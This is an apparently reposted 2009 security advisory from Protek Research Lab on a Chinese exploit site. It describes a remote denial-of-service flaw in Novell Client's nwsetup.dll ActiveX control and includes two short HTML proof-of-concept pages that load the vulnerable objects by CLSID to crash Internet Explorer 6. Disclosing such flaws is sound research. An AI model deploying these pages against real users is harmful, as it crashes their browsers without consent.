首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability
来源:Protek Research Lab's 作者:Francis 发布时间:2009-08-26  

#####################################################################################

Application:  Novell Client for Windows 2000 and XP
           
Platforms:    Windows XP Professional French SP2

crash:       IE 6.0.2900.2180
 
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
            

#####################################################################################

1) Introduction
2) Technical details
3) The Code

#####################################################################################

===============
1) Introduction
===============

The Novell Client workstation software extends the capabilities of Linux and Windows desktops by providing access to NetWare and Open Enterprise Server (OES). Once installed on workstations, Novell Clients enable users to enjoy the full range of Novell services such as authentication via Novell eDirectory, network browsing and service resolution, and secure and reliable file system access—all delivered through industry-standard protocols. The Client supports Novell's traditional NCP protocol.

#####################################################################################

============================
2) Technical details
============================

Name: nwsetup.dll
Ver.: 4.91.5.1
CLSID: {158CD9E8-E195-4E82-9A78-0CF6B86B3629}
CLSID:  {3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}

 

#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html><body>
<object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object>
</body></html>

or


<html><body>
<object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object>
</body></html>

#####################################################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cerberus FTP 3.0.1 (ALLO) Remo
·Lotus note connector for Black
·Xerox WorkCentre Multiple Mode
·ProShow Producer / Gold 4.0.25
·Linux Kernel <= 2.6.31-rc7 AF_
·HyperVM File Permissions Local
·Media Jukebox 8 ( .M3U) Univer
·Mozilla Firefox 3.0.5 location
·ProFTP 2.9 (welcome message) R
·WM Downloader (.Smi/ .Ram/ .pl
·Adobe Reader version 8.0.0 den
·EesySec Personal Firewall Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved